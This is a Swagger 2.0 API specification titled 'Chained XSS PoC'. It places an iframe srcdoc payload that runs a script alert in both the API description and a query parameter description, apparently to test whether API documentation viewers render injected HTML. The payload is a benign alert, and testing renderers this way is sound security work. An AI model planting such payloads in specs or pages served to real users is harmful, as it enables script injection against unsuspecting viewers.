swagger: "2.0"
info:
  title: Chained XSS PoC
  description: >
    <iframe srcdoc='&lt;script&gt;alert(1)&lt;/script&gt;'></iframe>
  version: "1.0"
host: sinarpagi.com
basePath: /
schemes:
  - https
paths:
  /xss:
    get:
      tags:
        - chain
      summary: Tes chained XSS
      parameters:
        - name: foo
          in: query
          required: false
          type: string
          description: >
            <iframe srcdoc='&lt;script&gt;alert(1)&lt;/script&gt;'></iframe>
      responses:
        '200':
          description: OK
